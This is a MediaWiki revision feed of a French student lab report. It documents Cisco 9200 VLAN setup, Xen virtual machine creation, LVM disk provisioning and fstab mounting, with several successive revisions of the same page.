&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56277</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56277"/>
				<updated>2021-10-25T15:53:52Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Création de notre VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56230</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56230"/>
				<updated>2021-10-25T14:58:35Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56228</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56228"/>
				<updated>2021-10-25T14:58:15Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56215</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56215"/>
				<updated>2021-10-25T14:50:59Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56211</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56211"/>
				<updated>2021-10-25T14:49:05Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su -&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56209</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56209"/>
				<updated>2021-10-25T14:47:36Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su -&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56181</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56181"/>
				<updated>2021-10-25T14:25:37Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56178</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56178"/>
				<updated>2021-10-25T14:23:49Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Paramétrage des VLANs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;/div&gt;</summary>
